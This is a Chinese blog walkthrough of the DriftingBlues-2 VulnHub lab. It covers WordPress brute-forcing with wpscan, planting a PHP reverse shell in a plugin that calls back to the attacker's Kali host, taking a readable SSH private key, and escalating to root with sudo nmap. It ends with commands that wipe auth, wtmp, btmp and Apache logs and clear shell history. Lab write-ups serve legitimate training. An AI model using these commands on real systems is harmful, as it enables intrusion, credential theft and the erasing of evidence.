vulnhub靶场【DriftingBlues】之2

MC何失眠2024-12-16 12:32

前言

靶机:DriftingBlues-2

攻击:kali

都采用虚拟机技术,网卡为桥接模式

主机发现

使用arp-scan -l或者netdiscover -r 192.168.1.1/24

信息收集

使用nmap扫描端口

网站探测

访问80端口,只有背景图,查看页面源代码,也是如此

尝试进行目录扫描

使用gobuster、dirsearch、dirb、dirbuster、ffuf等工具

shell 复制代码 
gobuster dir -u http://192.168.1.59 -w /usr/share/wordlists/dirb/big.txt -x php,zip,md,txt,html,jpg -b 404

当然这里使用gobuster只是进行一层目录扫描,不深入,想要深入,可以使用dirsearch、dirb

使用dirb效果演示

访问/blog目录,发现在连接时,在连接一个域名,并且,内容加载有问题,猜测可能需要绑定解析

使用whatweb进行指纹识别,确定CMS为wordpress

使用针对wordpress的扫描工具wpscan

shell 复制代码 
wpscan --url http://192.168.1.59/blog

漏洞寻找

继续使用wpscan枚举用户

shell 复制代码 
wpscan --url http://192.168.1.59/blog -e u

发现用户albert

尝试进行爆破,出现密码,用户名albert,密码scotland1

shell 复制代码 
wpscan --url http://192.168.1.59/blog -e u -P /usr/share/wordlists/rockyou.txt

访问/blog/wp-admin时,发现跳转域名,需要进行绑定,修改/etc/hosts文件后,可正常访问

漏洞利用

登录测试,发现登录成功,测试查看插件,发现一个插件,把该插件启用

然后编辑这个插件,测试能否修改,发现可以修改

kali中的脚本/usr/share/webshells/php/php-reverse-shell.php复制到这里面,脚本中的ipkali的ip地址

kali中开启监听端口1234,浏览器刷新即可,因为这个插件就是用户登录后的右上角,打招呼hello

靶机内信息收集

使用compgen -c或者dpkg -l | grep python,查看有无安装python

使用python获取一个交互式界面

shell 复制代码 
python3 -c 'import pty;pty.spawn("/bin/bash")'

使用find寻找具有SUID权限文件,发现sudo,但是需要密码

使用find寻找capabilities,并无可用

shell 复制代码 
find / -type f -executable 2>/dev/null | xargs getcap -r 2>/dev/null

去网站目录下查看wp-config.php连接数据库的时候,有无使用靶机内的用户及密码,

查看当前靶机内的用户,只有freddieroot

到该用户的主目录,发现在其下的.ssh文件夹中的私钥文件id_rsa可读

提权

提权至freddie

把私钥文件id_rsa下载到kali或者复制到kali,然后指定该文件登录到freddie

突然想起之前的ftp端口打开,测试能否匿名访问,空密码登录成功

下载一个图片,测试有无隐藏信息,测试发现没有内容

那么就继续以freddiessh登录为主

提权至root

之前使用find寻找具有SUID权限时,有sudo,不过当时需要密码,这里还是没有密码,但是还是要测试一下

发现可以,不需要密码

这里就可以使用nmap通过sudo进行提权,因为这里不需要密码了。

那么如果不知道如何使用提权,可以查看网站gtfobins.github.io搜索使用

根据条件满足去使用,或者两种方法都测试也行,反正方法不多

shell 复制代码 
第一种方式,是nmap的输入不会回显,才能使用
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

第二种方式,需要nmap的版本对应2.02--5.21,可通过nmap --version查看
sudo nmap --interactive
nmap> !sh

这里的靶机nmap版本大于提权版本,所以使用第一种提权方式
第一种提权,在输入命令时,是看不到的,只能看到输出

清除痕迹

网站恢复

把网站中的内容恢复原状,把复制的脚本内容删除,然后恢复插件的原本状态

可以在当前终端,或者网站执行

各种日志清除

因为回显问题,所以这里不截图,放入命令

shell 复制代码 
sed -i "/192.168.1.16/d" auth.log
echo > btmp
echo > lastlog
echo > wtmp
echo > apache2/access.log
echo > apache2>error.log
历史记录清除
shell 复制代码 
history -r 
history -c

总结

  1. 考察wordpress模板中怎么寻找漏洞,以及工具wpscan熟练使用
  2. 考察ssh服务的基本,这里主要以考察公私钥
  3. 考察基本的sudo提权
相关推荐
行者游学27 分钟前
ETCD 学习使用
数据库·学习·etcd
せいしゅん青春之我38 分钟前
【JavaEE初阶】网络原理——TCP报文结构、确认应答机制
网络·笔记·网络协议·tcp/ip·java-ee
Python私教2 小时前
Unity 游戏开发「工业化级」学习路线 2025 版
学习·unity·游戏引擎
charlie1145141912 小时前
2D 计算机图形学基础速建——2
笔记·学习·线性代数·教程·计算机图形学
☆璇2 小时前
【Linux】数据链路层
linux·服务器·网络
勇往直前plus3 小时前
学习和掌握RabbitMQ及其与springboot的整合实践(篇二)
spring boot·学习·rabbitmq·java-rabbitmq
电鱼智能的电小鱼3 小时前
基于电鱼 ARM 工控机的AI视频智能分析方案:让传统监控变得更聪明
网络·arm开发·人工智能·嵌入式硬件·算法·音视频
py有趣4 小时前
LeetCode算法学习之杨辉三角
学习·算法·leetcode
2501_915909064 小时前
网络调试工具推荐 Fiddler抓包工具使用教程与代理设置详解(HTTP/HTTPS配置与实战技巧)
网络·http·ios·小程序·fiddler·uni-app·webview
具身新纪元4 小时前
现代机器人学习入门:一份来自Hugging Face与牛津大学的综合教程开源SOTA资源库
学习·机器人
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04GitLab 零基础入门指南:从安装到项目管理全流程05Linux下V2Ray安装配置指南06NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南07Labelme从安装到标注:零基础完整指南08安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)09jdk21下载、安装(Windows、Linux、macOS)10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)